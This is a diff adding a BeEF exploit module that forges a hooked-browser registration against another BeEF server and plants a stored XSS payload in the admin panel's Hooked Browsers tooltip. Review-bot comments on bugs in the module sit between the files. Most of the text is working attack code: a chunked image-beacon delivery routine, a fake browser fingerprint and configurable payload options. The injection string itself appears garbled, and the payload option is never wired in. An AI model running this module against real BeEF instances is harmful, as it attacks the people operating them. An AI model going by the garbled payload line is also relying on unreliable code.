diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js
new file mode 100644
index 000000000..10318f560
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/command.js
@@ -0,0 +1,167 @@
+//
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var target_beef_url = "<%= @target_beef_url %>";
+ var xss_payload = "<%= @xss_payload %>";
+
+ // Generate a random session ID (80 characters, uppercase + digits)
+ function generateHookId() {
+ var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
+ var result = '';
+ for (var i = 0; i < 80; i++) {
+ result += chars.charAt(Math.floor(Math.random() * chars.length));
+ }
+ return result;
+ }
+
+ // Get current timestamp in milliseconds
+ function ts() {
+ return Date.now();
+ }
+
+ // Split string into chunks
+ function chunkString(str, length) {
+ var chunks = [];
+ for (var i = 0; i < str.length; i += length) {
+ chunks.push(str.substring(i, i + length));
+ }
+ return chunks;
+ }
+
+ // Base64 encode (using browser's btoa)
+ function b64encode(str) {
+ return btoa(str);
+ }
+
+ var HOOK = generateHookId();
+
+ // Build the malicious payload - XSS is injected into host.os.name
+ var malicious_os_name = 'Linux
';
+
+ var browser_data = [{
+ "cid": 0,
+ "results": {
+ "browser.window.cookies": "BEEFHOOK=" + HOOK,
+ "browser.name": "FFAA",
+ "browser.version": "146.0",
+ "browser.engine": "Gecko",
+ "browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0",
+ "browser.platform": "Linux x86_64",
+ "browser.language": "en-US",
+ "browser.plugins": "PDF Viewer-v.undefined",
+ "browser.window.title": "Unknown",
+ "browser.window.origin": "http://exploited-host:8000",
+ "browser.window.hostname": "exploited-host",
+ "browser.window.hostport": "8000",
+ "browser.window.uri": "http://exploited-host:8000/victim.html",
+ "browser.window.referrer": "http://exploited-host:8000/victim.html",
+ "browser.window.size.width": 1678,
+ "browser.window.size.height": 168,
+ "browser.date.datestamp": new Date().toString(),
+ "host.os.name": malicious_os_name,
+ "host.os.family": "Linux",
+ "host.os.arch": 64,
+ "host.software.defaultbrowser": "Unknown",
+ "hardware.type": "Unknown",
+ "hardware.memory": "unknown",
+ "hardware.gpu": "unknown",
+ "hardware.gpu.vendor": "unknown",
+ "hardware.cpu.arch": "x86_64",
+ "hardware.cpu.cores": 32,
+ "hardware.battery.chargingstatus": "unknown",
+ "hardware.battery.level": "unknown",
+ "hardware.battery.chargingtime": "unknown",
+ "hardware.battery.dischargingtime": "unknown",
+ "hardware.screen.size.width": 5120,
+ "hardware.screen.size.height": 2160,
+ "hardware.screen.colordepth": 24,
+ "hardware.screen.touchenabled": "No",
+ "browser.capabilities.vbscript": "No",
+ "browser.capabilities.flash": "No",
+ "browser.capabilities.silverlight": "No",
+ "browser.capabilities.phonegap": "No",
+ "browser.capabilities.websocket": "Yes",
+ "browser.capabilities.webrtc": "No",
+ "browser.capabilities.webworker": "Yes",
+ "browser.capabilities.webgl": "No",
+ "browser.capabilities.googlegears": "No",
+ "browser.capabilities.activex": "No",
+ "browser.capabilities.quicktime": "No",
+ "browser.capabilities.realplayer": "No",
+ "browser.capabilities.wmp": "No",
+ "browser.capabilities.vlc": "No",
+ "HookSessionID": HOOK
+ },
+ "status": 0,
+ "handler": "/init"
+ }];
+
+ var encoded_data = b64encode(JSON.stringify(browser_data));
+ var chunks = chunkString(encoded_data, 383);
+
+ beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url);
+ beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK);
+ beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length);
+
+ var requests_sent = 0;
+ var requests_completed = 0;
+ var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh
+
+ function checkComplete() {
+ if (requests_completed >= total_requests) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,
+ "result=Exploit sent successfully. Fake browser registered with Hook ID: " + HOOK +
+ ". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.",
+ beef.are.status_success());
+ }
+ }
+
+ // Send chunks for session IDs 1 and 2
+ for (var sid = 1; sid <= 2; sid++) {
+ for (var idx = 0; idx < chunks.length; idx++) {
+ (function(s, i, chunk) {
+ var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts();
+ var img = new Image();
+ img.onload = img.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img.src = url;
+ requests_sent++;
+ })(sid, idx, chunks[idx]);
+ }
+ }
+
+ // Send hook.js request after a short delay
+ setTimeout(function() {
+ var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts();
+ var img2 = new Image();
+ img2.onload = img2.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img2.src = hookUrl;
+ requests_sent++;
+
+ // Send final dh request
+ setTimeout(function() {
+ var finalChunk = chunks[chunks.length - 1] || "";
+ var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts();
+ var img3 = new Image();
+ img3.onload = img3.onerror = function() {
+ requests_completed++;
+ checkComplete();
+ };
+ img3.src = finalUrl;
+ requests_sent++;
+ }, 100);
+ }, 500);
+
+ beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");
+
+});
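Review bot: `xss_payload` is assigned at L16 but never referenced again in this hunk, and `malicious_os_name` (rendered across L50-51) is a bare `'Linux'` string, so as shown the operator-supplied payload never reaches `host.os.name` and the module registers a harmless fake browser; if an injection fragment was lost in rendering, confirm against the committed file, otherwise wire the option in. Independently, both options are spliced into double-quoted JS literals by ERB with no escaping, so a payload containing `"`, `\` or a newline (e.g. `alert("x")`) terminates the literal and breaks the entire command script before a single request is sent; emit a JSON-encoded literal instead, `var xss_payload = <%= @xss_payload.to_json %>;` and likewise for `target_beef_url`, assuming the JSON library BeEF already loads is reachable from the template. The completion message at L125-126 reports "Exploit sent successfully" whenever `requests_completed` reaches the total, but `onload` and `onerror` are counted identically (L137, L151, L163) and the `/dh` and `/hook.js` responses are presumably not valid images, so `onerror` fires on success, on a 404 and on connection-refused alike and the result cannot distinguish a delivered registration from an unreachable target; word it as `"result=Requests dispatched (delivery not verifiable via image beacon). Fake browser Hook ID: " + HOOK` or switch to `beef.net` requests whose status is inspectable. Minor: the `requests_sent` debug line at L172 runs before the two `setTimeout` callbacks, so it always under-reports by two.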
diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml
new file mode 100644
index 000000000..ecdd537e8
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ beef_admin_panel_xss:
+ enable: true
+ category: "Exploits"
+ name: "BeEF Admin Panel XSS"
+ description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.
This can be used to test if a target BeEF instance is running a vulnerable version."
+ authors: ["radsec"]
+ target:
+ working: ["ALL"]
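Review bot: The description asserts the module "can be used to test if a target BeEF instance is running a vulnerable version", yet neither the description nor any metadata key names the affected BeEF versions or the release/commit that fixed the tooltip escaping, so an operator has no way to interpret a successful run. Add that once it is confirmed, along the lines of `Affected: BeEF releases prior to <fixed release>; fixed versions HTML-escape host.os.name in the Hooked Browsers tooltip`, and do not guess at a version in the meantime. The double-quoted description scalar also appears wrapped across L192-193; YAML folds that line break into a space, which parses, but keeping the scalar on one line or using `>` folded style makes it obvious the string is not truncated.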
diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb
new file mode 100644
index 000000000..c5753dc76
--- /dev/null
+++ b/modules/exploits/beef_admin_panel_xss/module.rb
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beef_admin_panel_xss < BeEF::Core::Command
+ def self.options
+ [
+ { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' },
+ { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' }
+ ]
+ end
+
+ def post_execute
+ save({ 'result' => @datastore['result'] })
+ end
+end
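Review bot: The `target_beef_url` default `http://localhost:3000` at L211 is consumed by command.js inside the hooked browser, where it is used as an `Image.src` base, so out of the box the fake registration is sent to port 3000 on the victim's own machine rather than to the operator's target, and the module will still report success because both load and error callbacks count as completion. Default to an empty value and make the requirement explicit in the label, e.g. `'value' => '', 'ui_label' => 'Target BeEF URL (must be reachable from the hooked browser)'`, and consider rejecting an empty or non-http(s) value before the command is queued. `post_execute` at L216-218 persists only `result`, which matches the single string command.js sends; a one-line comment such as `# command.js returns a single 'result' string containing the generated hook ID` would spare the next reader a trip to the template.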